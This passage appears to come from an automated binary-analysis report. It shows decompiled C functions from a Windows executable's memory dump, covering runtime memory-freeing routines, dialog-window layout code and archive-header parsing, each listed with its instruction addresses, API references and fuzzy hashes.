						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0xdad5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}



















































              0x00d7d723
              0x00d7d72d
              0x00d7d731
              0x00d7d736
              0x00d7d748
              0x00d7d752
              0x00d7d757
              0x00d7d75e
              0x00d7d761
              0x00d7d765
              0x00d7d76b
              0x00d7d7c8
              0x00d7d7e0
              0x00d7d7e8
              0x00d7d7ec
              0x00d7d7f8
              0x00d7d80a
              0x00d7d811
              0x00d7d815
              0x00d7d818
              0x00d7d820
              0x00d7d826
              0x00d7d82c
              0x00d7d8cd
              0x00d7d8cd
              0x00d7d8d5
              0x00d7d906
              0x00d7d906
              0x00d7d90c
              0x00d7d917
              0x00d7d919
              0x00d7d91f
              0x00d7d921
              0x00d7d927
              0x00d7d9d9
              0x00d7d9d9
              0x00d7d9d9
              0x00d7d92d
              0x00d7d9c7
              0x00d7d934
              0x00d7d93a
              0x00000000
              0x00000000
              0x00d7d946
              0x00d7d950
              0x00d7d965
              0x00d7d96a
              0x00d7d96d
              0x00d7d983
              0x00d7d98b
              0x00d7d98d
              0x00d7d98e
              0x00d7d996
              0x00d7d9a8
              0x00d7d9af
              0x00d7d9b8
              0x00d7d9be
              0x00d7d9c0
              0x00d7d9c4
              0x00000000
              0x00000000
              0x00d7d9c6
              0x00d7d9c6
              0x00d7d9c6
              0x00000000
              0x00d7d9c7
              0x00d7d83a
              0x00000000
              0x00000000
              0x00d7d847
              0x00d7d848
              0x00d7d851
              0x00d7d856
              0x00d7d85c
              0x00d7d860
              0x00d7d861
              0x00d7d867
              0x00d7d871
              0x00d7d878
              0x00d7d881
              0x00d7d885
              0x00d7d889
              0x00d7d88b
              0x00d7d88b
              0x00d7d88f
              0x00d7d891
              0x00d7d891
              0x00d7d8b7
              0x00d7d8c3
              0x00d7d8c9
              0x00000000
              0x00d7d76d
              0x00d7d76d
              0x00d7d772
              0x00d7d775
              0x00d7d778
              0x00d7d780
              0x00d7d785
              0x00d7d78a
              0x00d7d79b
              0x00d7d7a5
              0x00d7d7b2
              0x00d7d7b2
              0x00d7d7a5
              0x00d7d7b8
              0x00d7d7b8
              0x00d7d7bc
              0x00d7d7bd
              0x00d7d7c0
              0x00d7d7c0
              0x00000000
              0x00d7d772

              APIs
              • _swprintf.LIBCMT ref: 00D7D731
                • Part of subcall function 00D73E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D73E54
                • Part of subcall function 00D811FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00DB0078,?,00D7CE91,00000000,?,00000050,00DB0078), ref: 00D81217
              • _strlen.LIBCMT ref: 00D7D752
              • SetDlgItemTextW.USER32(?,00DAD154,?), ref: 00D7D7B2
              • GetWindowRect.USER32(?,?), ref: 00D7D7EC
              • GetClientRect.USER32(?,?), ref: 00D7D7F8
              • GetWindowLongW.USER32(?,000000F0), ref: 00D7D896
              • GetWindowRect.USER32(?,?), ref: 00D7D8C3
              • SetWindowTextW.USER32(?,?), ref: 00D7D906
              • GetSystemMetrics.USER32(00000008), ref: 00D7D90E
              • GetWindow.USER32(?,00000005), ref: 00D7D919
              • GetWindowRect.USER32(00000000,?), ref: 00D7D946
              • GetWindow.USER32(00000000,00000002), ref: 00D7D9B8
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
              • String ID: $%s:$CAPTION$d
              • API String ID: 2407758923-2512411981
              • Opcode ID: 04603ae3903754fbd6ae691b49fac63fe92eeefb5049c32143a9dfc222c75ddb
              • Instruction ID: 99f6d9e27ade5b77bd0af449047f3a209edbdbe2e966f72cf723cf71e862f5f7
              • Opcode Fuzzy Hash: 04603ae3903754fbd6ae691b49fac63fe92eeefb5049c32143a9dfc222c75ddb
              • Instruction Fuzzy Hash: 75817E72508341AFD710DF68CC85A6FBBFAEF89704F04491DFA89D3290E770A9058B62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D9B784, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D9B784(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xdadd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00D97A50(_t46);
							E00D9B363( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00D97A50(_t47);
							E00D9B461( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00D97A50( *((intOrPtr*)(_t74 + 0x7c)));
						E00D97A50( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00D97A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00D97A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00D97A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00D97A50( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00D9B8F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xdad818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00D97A50(_t31);
							E00D97A50( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00D97A50(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00D97A50(_t74);
			}















              0x00d9b78c
              0x00d9b790
              0x00d9b798
              0x00d9b7a1
              0x00d9b7a6
              0x00d9b7ad
              0x00d9b7b5
              0x00d9b7bd
              0x00d9b7c8
              0x00d9b7ce
              0x00d9b7cf
              0x00d9b7d7
              0x00d9b7df
              0x00d9b7ea
              0x00d9b7f0
              0x00d9b7f4
              0x00d9b7ff
              0x00d9b805
              0x00d9b7a6
              0x00d9b806
              0x00d9b80e
              0x00d9b821
              0x00d9b834
              0x00d9b842
              0x00d9b84d
              0x00d9b852
              0x00d9b85b
              0x00d9b863
              0x00d9b864
              0x00d9b86a
              0x00d9b86d
              0x00d9b870
              0x00d9b877
              0x00d9b879
              0x00d9b87d
              0x00d9b885
              0x00d9b88c
              0x00d9b892
              0x00d9b893
              0x00d9b893
              0x00d9b89a
              0x00d9b89c
              0x00d9b8a1
              0x00d9b8a9
              0x00d9b8ae
              0x00d9b8af
              0x00d9b8af
              0x00d9b8b2
              0x00d9b8b5
              0x00d9b8b8
              0x00d9b8bb
              0x00d9b8bb
              0x00d9b8cd

              APIs
              • ___free_lconv_mon.LIBCMT ref: 00D9B7C8
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B380
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B392
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B3A4
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B3B6
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B3C8
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B3DA
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B3EC
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B3FE
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B410
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B422
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B434
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B446
                • Part of subcall function 00D9B363: _free.LIBCMT ref: 00D9B458
              • _free.LIBCMT ref: 00D9B7BD
                • Part of subcall function 00D97A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?), ref: 00D97A66
                • Part of subcall function 00D97A50: GetLastError.KERNEL32(?,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?,?), ref: 00D97A78
              • _free.LIBCMT ref: 00D9B7DF
              • _free.LIBCMT ref: 00D9B7F4
              • _free.LIBCMT ref: 00D9B7FF
              • _free.LIBCMT ref: 00D9B821
              • _free.LIBCMT ref: 00D9B834
              • _free.LIBCMT ref: 00D9B842
              • _free.LIBCMT ref: 00D9B84D
              • _free.LIBCMT ref: 00D9B885
              • _free.LIBCMT ref: 00D9B88C
              • _free.LIBCMT ref: 00D9B8A9
              • _free.LIBCMT ref: 00D9B8C1
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 365358c93fb87321ec09e6da88588f147f5b7955aab0b69c3adbf4bf3f96b23b
              • Instruction ID: 15d6e9611139000fe33b33d9ed64474ead2c4af67cde5419c162217234741d2c
              • Opcode Fuzzy Hash: 365358c93fb87321ec09e6da88588f147f5b7955aab0b69c3adbf4bf3f96b23b
              • Instruction Fuzzy Hash: 29314B716043009FEF20AAB9EA85B9E77E8EF05360F19542AE05AD7151DF30AD808B78
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D8C343, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D8C343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E00D8D940();
				_t10 = E00D8952A(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E00D81410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E00D8958C(_v20);
							SendMessageW(_t34, 0x172, 0, E00D8975D(_t29, _t45, _t28, E00D89549(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}















              0x00d8c343
              0x00d8c343
              0x00d8c34b
              0x00d8c350
              0x00d8c357
              0x00d8c42e
              0x00d8c42e
              0x00d8c364
              0x00d8c36a
              0x00d8c36c
              0x00d8c36e
              0x00d8c373
              0x00d8c429
              0x00000000
              0x00d8c42a
              0x00d8c37a
              0x00d8c393
              0x00d8c3ac
              0x00d8c3ce
              0x00d8c3d2
              0x00d8c3db
              0x00d8c3e4
              0x00d8c402
              0x00d8c409
              0x00d8c409
              0x00d8c3d2
              0x00d8c412
              0x00d8c418
              0x00d8c41d
              0x00d8c41f
              0x00d8c422
              0x00000000
              0x00000000
              0x00d8c422
              0x00000000
              0x00d8c41d
              0x00000000

              APIs
              • GetWindow.USER32(?,00000005), ref: 00D8C364
              • GetClassNameW.USER32(00000000,?,00000800), ref: 00D8C393
                • Part of subcall function 00D81410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00D7ACFE,?,?,?,00D7ACAD,?,-00000002,?,00000000,?), ref: 00D81426
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00D8C3B1
              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D8C3C8
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00D8C3DB
                • Part of subcall function 00D8958C: GetDC.USER32(00000000), ref: 00D89598
                • Part of subcall function 00D8958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D895A7
                • Part of subcall function 00D8958C: ReleaseDC.USER32(00000000,00000000), ref: 00D895B5
                • Part of subcall function 00D89549: GetDC.USER32(00000000), ref: 00D89555
                • Part of subcall function 00D89549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00D89564
                • Part of subcall function 00D89549: ReleaseDC.USER32(00000000,00000000), ref: 00D89572
              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D8C402
              • DeleteObject.GDI32(00000000), ref: 00D8C409
              • GetWindow.USER32(00000000,00000002), ref: 00D8C412
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
              • String ID: STATIC
              • API String ID: 1444658586-1882779555
              • Opcode ID: 185e9c852a4f95b507959d12ad42a8cdbf13d4e812db5081e32e2bb73b524551
              • Instruction ID: d3f2ca382e73bb772a4db534dd532d24c675fda17cd07c8ca4e526e143faa646
              • Opcode Fuzzy Hash: 185e9c852a4f95b507959d12ad42a8cdbf13d4e812db5081e32e2bb73b524551
              • Instruction Fuzzy Hash: 57219F72550354BFEB217B68CC5AFEF762DEF06710F049021FA42E6191CB749A8287B0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D98422, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D98422(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0xda4be0) {
					E00D97A50(_t52);
					_t26 = _a4;
				}
				E00D97A50( *((intOrPtr*)(_t26 + 0x3c)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x30)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x34)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x38)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x28)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x2c)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x40)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x44)));
				E00D97A50( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00D982E8(5,  &_v8);
				_v8 =  &_a4;
				return E00D98338(4,  &_v8);
			}




              0x00d98428
              0x00d9842b
              0x00d98433
              0x00d98436
              0x00d9843b
              0x00d9843e
              0x00d98442
              0x00d9844d
              0x00d98458
              0x00d98463
              0x00d9846e
              0x00d98479
              0x00d98484
              0x00d9848f
              0x00d9849d
              0x00d984a5
              0x00d984ae
              0x00d984b6
              0x00d984ca

              APIs
              • _free.LIBCMT ref: 00D98436
                • Part of subcall function 00D97A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?), ref: 00D97A66
                • Part of subcall function 00D97A50: GetLastError.KERNEL32(?,?,00D9B4F8,?,00000000,?,00000000,?,00D9B51F,?,00000007,?,?,00D9B91C,?,?), ref: 00D97A78
              • _free.LIBCMT ref: 00D98442
              • _free.LIBCMT ref: 00D9844D
              • _free.LIBCMT ref: 00D98458
              • _free.LIBCMT ref: 00D98463
              • _free.LIBCMT ref: 00D9846E
              • _free.LIBCMT ref: 00D98479
              • _free.LIBCMT ref: 00D98484
              • _free.LIBCMT ref: 00D9848F
              • _free.LIBCMT ref: 00D9849D
              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 8407dbf62e80f8f35369d3e575439e4d5b47f13308ae2345b05b2bfef42a130e
              • Instruction ID: 3316fc4ec338adc2c579d60366355827c6cc2925ba2cd4bfeac85b448a785d6f
              • Opcode Fuzzy Hash: 8407dbf62e80f8f35369d3e575439e4d5b47f13308ae2345b05b2bfef42a130e
              • Instruction Fuzzy Hash: 91117276524108EFCF01EFA4C942CDE3BA9EF05350B5191A5FA1D8B222DA31EB509BB4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7200C, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00D7200C(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E00D8D940();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E00D7C39E(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E00D7C39E(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E00D7C39E(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E00D7C39E(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E00D7C39E(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E00D7C39E(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E00D7C39E(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E00D7C251(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E00D73E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E00D73DEC(_t257, _t240 + 0x28, _t167);
												}
												E00D7C300(_t318, _t240 + 0x10a1, 0x10);
												E00D7C300(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E00D7C300(_t318, _t240 + 0x10c2, 8);
													E00D7C300(_t318, _t344 + 0x30, 4);
													E00D7F524(_t344 + 0x58);
													E00D7F56A(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E00D7F435(_t344 + 0x5c);
													_t161 = E00D8F3CA(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E00D8F3CA(_t325, 0xda2398, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E00D73E41(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E00D73DEC(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E00D7C39E(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E00D7C300(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E00D7C39E(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00D80A64(_t240 + 0x1040, _t315, E00D7C2E0(_t278, __eflags), _t315);
													} else {
														E00D80A25(_t240 + 0x1040, _t315, E00D7C29E(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E00D80A64(_t240 + 0x1048, _t315, E00D7C2E0(_t275, __eflags), _t315);
													} else {
														E00D80A25(_t240 + 0x1048, _t315, E00D7C29E(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E00D80A64(_t240 + 0x1050, _t315, E00D7C2E0(_t272, __eflags), _t315);
													} else {
														E00D80A25(_t240 + 0x1050, _t315, E00D7C29E(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E00D7C29E(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E00D806D0(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E00D7C29E(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E00D806D0(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E00D7C29E(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E00D806D0(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E00D7C39E(_t315);
												__eflags = E00D7C39E(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E00D73E41(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E00D7FA89(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E00D7C39E(_t315);
